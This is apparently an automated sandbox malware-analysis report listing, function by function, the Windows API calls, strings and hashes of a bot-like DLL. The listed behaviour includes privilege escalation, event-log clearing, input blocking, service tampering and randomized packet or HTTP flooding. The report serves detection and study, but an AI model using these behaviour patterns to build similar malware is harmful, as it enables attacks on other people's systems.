                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$Global$Close$??2@??3@DataLockOpenSizeUnlock
                                • String ID:
                                • API String ID: 3218637236-0
                                • Opcode ID: 301b849cb216ea75fb687118c830899b240c7ce3f9174140f969f020cf22927b
                                • Instruction ID: 8bd8b15d585b0a66e5e0549ea23a2daac3cce8b349df5dd2cf32f6ef4495ba93
                                • Opcode Fuzzy Hash: 301b849cb216ea75fb687118c830899b240c7ce3f9174140f969f020cf22927b
                                • Instruction Fuzzy Hash: 410122356043646FE700EF349C89AAB379AFF45741F404528FD0686200EBB5AC08C6B2
                                Function 1000FA20 Relevance: 12.0, APIs: 8, Instructions: 38clipboardmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32(00000000), ref: 1000FA22
                                • EmptyClipboard.USER32 ref: 1000FA2E
                                • GlobalAlloc.KERNEL32(00002000,?,?,?,?,?), ref: 1000FA3E
                                • GlobalLock.KERNEL32(00000000), ref: 1000FA4C
                                • GlobalUnlock.KERNEL32(00000000), ref: 1000FA69
                                • SetClipboardData.USER32(00000001,00000000), ref: 1000FA72
                                • GlobalFree.KERNEL32(00000000), ref: 1000FA79
                                • CloseClipboard.USER32 ref: 1000FA80
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
                                • String ID:
                                • API String ID: 453615576-0
                                • Opcode ID: beee4563180182b3370716e68273ada2ef01d43424950d4e564b3c7d5d6ba5bf
                                • Instruction ID: 6a4c86568739cfa889f9428084719cbd4829a3f5d72f13fa7c8734bacd2a58ba
                                • Opcode Fuzzy Hash: beee4563180182b3370716e68273ada2ef01d43424950d4e564b3c7d5d6ba5bf
                                • Instruction Fuzzy Hash: 5EF01D722003A19BF704AB708CCCA6B3A9AFB59792F040428FA46D6251CFA48C06D761
                                Function 10011F80 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F90
                                • OpenProcessToken.ADVAPI32(00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F97
                                • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10011FC7
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011FDF
                                • GetLastError.KERNEL32(?,10009CF0,?,00000000,00000000,00000001), ref: 10011FE5
                                • CloseHandle.KERNEL32(?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011FF6
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                • String ID:
                                • API String ID: 3398352648-0
                                • Opcode ID: d51332a10edc9ed0de53dc67db3489fbf75492b4b1e06feea115e57508ad5e88
                                • Instruction ID: cc3510a64544969e40c7ba664627dc8a20d979994d2bd73b5cc00ac410b68b64
                                • Opcode Fuzzy Hash: d51332a10edc9ed0de53dc67db3489fbf75492b4b1e06feea115e57508ad5e88
                                • Instruction Fuzzy Hash: D401B171604361ABF704DB64CC8AF9B77A9FF88B00F41892CF9858A190D7F4EC449BA1
                                Function 10008F00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNEL32(00000021,?,00000021,00000000,00000001), ref: 10008F3F
                                • FindClose.KERNEL32(00000000), ref: 10008FB9
                                • CreateFileA.KERNEL32(00000021,40000000,00000002,00000000,00000002,00000080,00000000), ref: 10008FD1
                                • CloseHandle.KERNEL32(00000000), ref: 10008FFB
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileFind$CreateFirstHandle
                                • String ID: p
                                • API String ID: 3283578348-2181537457
                                • Opcode ID: 2c8b732b24ebe096cefe3b9dd28e29c66e00d67b571492c13087e5889d7322dd
                                • Instruction ID: a9351d47ce1d038b449e59aee4ebb529ff1c7d311b8e8fe0981f574282c16cb6
                                • Opcode Fuzzy Hash: 2c8b732b24ebe096cefe3b9dd28e29c66e00d67b571492c13087e5889d7322dd
                                • Instruction Fuzzy Hash: E931B5719083139BE324DF28CC4576AB6AAFBC43E0F15853EF8999B3D4C6748A448792
                                Function 1000A4D0 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                Download Yara Rule
                                APIs
                                • OpenEventLogA.ADVAPI32(00000000), ref: 1000A50C
                                • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 1000A517
                                • CloseEventLog.ADVAPI32(00000000), ref: 1000A51A
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$ClearCloseOpen
                                • String ID:
                                • API String ID: 1391105993-0
                                • Opcode ID: 2e8b92724baef040b74a099688e4ca11ceeaa7323f097ad490cf6ea05752eb0a
                                • Instruction ID: 2f13a3a00fc351755ca7788bc276ed95c0dd4850e5c3601e4dc9bed05caac4f8
                                • Opcode Fuzzy Hash: 2e8b92724baef040b74a099688e4ca11ceeaa7323f097ad490cf6ea05752eb0a
                                • Instruction Fuzzy Hash: 6EF096715057529BE300DF09CC80B5FBBE4FF85750F800908FA5497210D3B5AA598BEA
                                Function 1000F3A0 Relevance: 3.2, APIs: 2, Instructions: 152keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • BlockInput.USER32(00000000), ref: 1000F45C
                                • BlockInput.USER32(?,?,?,00000000), ref: 1000F475
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: BlockInput
                                • String ID:
                                • API String ID: 3456056419-0
                                • Opcode ID: 89eaa9efebe0b394a2daade3a841e7d355f6256b3a47bd97c9d23898dd999a22
                                • Instruction ID: f75e578da579e437ca953510df7974459397082eec6ccbfe99a7c7589e24c54f
                                • Opcode Fuzzy Hash: 89eaa9efebe0b394a2daade3a841e7d355f6256b3a47bd97c9d23898dd999a22
                                • Instruction Fuzzy Hash: 4B411837B486849BC314DF98A441BBEFB75FBC6621F0086AFE85583B00CB366914D7A1
                                Function 10001800 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: hXMV$hXMV
                                • API String ID: 0-400149659
                                • Opcode ID: bb9fbec34bb74b578b789555242fbb2c4049be8c3a5e02f866b0156cd7be93d0
                                • Instruction ID: 79a79fee38ca8a1330c9593f9425e5eef8b4821128400f5dbd5ea3b8bade0337
                                • Opcode Fuzzy Hash: bb9fbec34bb74b578b789555242fbb2c4049be8c3a5e02f866b0156cd7be93d0
                                • Instruction Fuzzy Hash: 08F0C272D08685AAD7008B4ADC51BAFFBB8E745B20F20422AE524537C1D63A18018AA0
                                Function 10002800 Relevance: 1.5, APIs: 1, Instructions: 10nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 10002814
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: NtdllProc_Window
                                • String ID:
                                • API String ID: 4255912815-0
                                • Opcode ID: cd21bd2416f1a32ff3a22d08b90a7fc46063fe3e610cbd224e1e98767f6be9da
                                • Instruction ID: 58df3dc0681e3f39cf6c8608bd8a8251fa6d00a740b542f493d238d21b34862f
                                • Opcode Fuzzy Hash: cd21bd2416f1a32ff3a22d08b90a7fc46063fe3e610cbd224e1e98767f6be9da
                                • Instruction Fuzzy Hash: 0CC0EAB9608351AFD604CB54C888D6BB7E9EBC8340F00C909B59A83254C770E840CB22
                                Function 10025DC0 Relevance: .1, Instructions: 86COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4162b8fd09a8058dfffab31c4ebf9cf9939f72c70a79160d24adbb6f6ac3f189
                                • Instruction ID: afa899698315f790dea508b65044e70b833291bd3a009e442af8b39958c29264
                                • Opcode Fuzzy Hash: 4162b8fd09a8058dfffab31c4ebf9cf9939f72c70a79160d24adbb6f6ac3f189
                                • Instruction Fuzzy Hash: 781182B2B68D170AFB1C55ACEC797793683E384319F1A9B3C570BC62C0DDBD69481198
                                Function 10005880 Relevance: 70.4, APIs: 34, Strings: 6, Instructions: 417stringnetworksleepCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: htons$strcspn$strstr$inet_addr$strncpy$htonlsetsockopt$CountSleepSocketTickprintfrandsendtowsprintf
                                • String ID: %d.%d.%d.%d$192.168.1.244$@$E$P$http://
                                • API String ID: 322722939-1061493658
                                • Opcode ID: fa133e97be830d63c3937d69d0e00783affe932c38cfb30cb5e04117bf83879f
                                • Instruction ID: 029872f007aae8b741d3009860af6db6cc3886bdaffc2e790e906b1155b7fa43
                                • Opcode Fuzzy Hash: fa133e97be830d63c3937d69d0e00783affe932c38cfb30cb5e04117bf83879f
                                • Instruction Fuzzy Hash: DFE1E3715083859AE320CB74CC41BABB7E5FFC4344F004A1DFA9997291DA74AA49CB97
                                Function 10005190 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 293stringnetworkthreadCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • %s, xrefs: 100053CD
                                • %s, xrefs: 1000542A
                                • GET %s HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/chpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: zh-cnAccept-Encoding: gzip, deflateIf-Modified-, xrefs: 10005416
                                • http://, xrefs: 100051B4, 10005205, 10005214
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: strcspn$printfstrstr$ExitThreadUserclosesocketstrncpy$Sleepinet_addr$connectgethostbynamehtonsinet_ntoasendsocketsprintf
                                • String ID: %s$%s$GET %s HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/chpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: zh-cnAccept-Encoding: gzip, deflateIf-Modified-$http://
                                • API String ID: 3360081097-1844242639
                                • Opcode ID: a09e518b96f0db453f2d109b9515bce755ecc3f272282edc9d1fbb50c6695935
                                • Instruction ID: e8874cd066fd205268a75987e0b1d8bfdcdc385e397420bfea7b2cf98142489c
                                • Opcode Fuzzy Hash: a09e518b96f0db453f2d109b9515bce755ecc3f272282edc9d1fbb50c6695935
                                • Instruction Fuzzy Hash: 9F91E6325043146BE304DB74CC84AAB7BE9EFC9351F044A18FA5693290DFB5EA49C795
                                Function 10005F50 Relevance: 63.3, APIs: 34, Strings: 2, Instructions: 306stringnetworkthreadCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: strcspn$strstr$printfstrncpy$CountExitThreadTickUserinet_addr$CleanupSleepSocketclosesocketgethostbynameinet_ntoarandsendtosetsockoptsrandtime
                                • String ID: %s$http://
                                • API String ID: 2910787541-1591606595
                                • Opcode ID: 714e4b3f82d11a8d2cdf065614fefdc8eb5a61599fc4361ed26ed8b059713b7f
                                • Instruction ID: 34865b7dc30fd38a5ae5f0f06fbf564a450e17f044507f999930ee5d5a8d3fda
                                • Opcode Fuzzy Hash: 714e4b3f82d11a8d2cdf065614fefdc8eb5a61599fc4361ed26ed8b059713b7f
                                • Instruction Fuzzy Hash: 78A1E5315043516BE314DB74CC84AAB7BEAFFC8350F404A2DF65697290EFB49A48CB96
                                Function 10011930 Relevance: 61.6, APIs: 33, Strings: 2, Instructions: 327stringsleepprocessCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 10011F80: GetCurrentProcess.KERNEL32(00000028,?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F90
                                  • Part of subcall function 10011F80: OpenProcessToken.ADVAPI32(00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F97
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00001F40,00001F40), ref: 100119D6
                                • LocalAlloc.KERNEL32 ref: 10011A04
                                • Sleep.KERNEL32(00000001), ref: 10011A19
                                • Process32First.KERNEL32(00000000,?), ref: 10011A28
                                • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?), ref: 10011A4B
                                • EnumProcessModules.PSAPI(00000000,00000040,00000004,?,?,00000000,?), ref: 10011A85
                                • GetModuleFileNameExA.PSAPI(00000000,00000040,?,00000104,00000000,00000040,00000004,?,?,00000000,?), ref: 10011A9D
                                • GetPriorityClass.KERNEL32(00000000,00000000,00000040,?,00000104,00000000,00000040,00000004,?,?,00000000,?), ref: 10011AA9
                                • wsprintfA.USER32 ref: 10011B3F
                                • lstrlen.KERNEL32(?,?,?,?,00000002,00000000,00001F40,00001F40), ref: 10011B75
                                • lstrlen.KERNEL32(?,?,00000002,00000000,00001F40,00001F40), ref: 10011B7E
                                • lstrlen.KERNEL32(?,?,00000002,00000000,00001F40,00001F40), ref: 10011B87
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$lstrlen$Open$AllocClassCreateCurrentEnumFileFirstLocalModuleModulesNamePriorityProcess32SleepSnapshotTokenToolhelp32wsprintf
                                • String ID: SYSTEM$SeDebugPrivilege
                                • API String ID: 1285126458-3052852743
                                • Opcode ID: 5e3ec088feefaa2b3cf88e8578a73bbd5f76fc6d3470febee6665a52a73cde3f
                                • Instruction ID: 0b961047b44daba82c00bbc082a7763861cb1e17bb1e44bbf086e1eb6c632ac9
                                • Opcode Fuzzy Hash: 5e3ec088feefaa2b3cf88e8578a73bbd5f76fc6d3470febee6665a52a73cde3f
                                • Instruction Fuzzy Hash: 29B1A2712083459BE718CB24CC91AEFB3E6FBC4704F41492CFA8597240EB79E949CB96
                                Function 10004310 Relevance: 54.5, APIs: 26, Strings: 5, Instructions: 242networksleepthreadCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: rand$htons$inet_addrsetsockopt$ExitSleepSocketStartupThreadUserhtonlsendtosprintf
                                • String ID: %d.%d.%d.%d$@$E$P$d
                                • API String ID: 872198723-3606021318
                                • Opcode ID: a2e921a84f5a9370c1cbf23c0c7c279e28e6e32964bf80e14801a405c00669c0
                                • Instruction ID: 8a7fd5c6b9d9dc2a36ee797d2ff7afdd41ddcd881716b64bea6de97d131c0ef0
                                • Opcode Fuzzy Hash: a2e921a84f5a9370c1cbf23c0c7c279e28e6e32964bf80e14801a405c00669c0
                                • Instruction Fuzzy Hash: 1181C0701483959AE310CF64CC80BABBBE6FFC9704F00491DF699972A1DBB49909CB5B
                                Function 10006410 Relevance: 52.8, APIs: 28, Strings: 2, Instructions: 263stringnetworkthreadCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: strcspn$strstr$strncpy$ExitThreadUserinet_addr$Sleepclosesocketgethostbynamehtonsprintfrandsendtosocketsrandtime
                                • String ID: %s:%d$http://
                                • API String ID: 3986318173-1702654977
                                • Opcode ID: b18c302a20b414ba0b999612ed69bf70c16094a003d45a29b836c5755b60ace6
                                • Instruction ID: 13eb3fa513dba6a830c19df937ef2a65af92b20ba7af4015ac3123da307f7ed1
                                • Opcode Fuzzy Hash: b18c302a20b414ba0b999612ed69bf70c16094a003d45a29b836c5755b60ace6
                                • Instruction Fuzzy Hash: BD81F3325043155BE704DF748C84AAB7AEAEFC9350F044A1DFA5697290EFB4DE08C795
                                Function 10010C90 Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 250servicesleepregistryCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010CF2
                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010D07
                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 10010D29
                                • ControlService.ADVAPI32(00000000,00000001,?), ref: 10010D4A
                                • Sleep.KERNEL32(00000320), ref: 10010D5D
                                • DeleteService.ADVAPI32(00000000), ref: 10010D64
                                • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 10010DCB
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010E1C
                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010E33
                                • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 10010E48
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 10010E4F
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010E61
                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010E78
                                • LockServiceDatabase.ADVAPI32(00000000), ref: 10010E89
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,00000000), ref: 10010EAE
                                • OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 10010EC5
                                • LockServiceDatabase.ADVAPI32(00000000), ref: 10010ED6
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010EFB
                                • OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 10010F12
                                • ControlService.ADVAPI32(00000000,00000001,?), ref: 10010F28
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 10010F2F
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,00000000), ref: 10010F3E
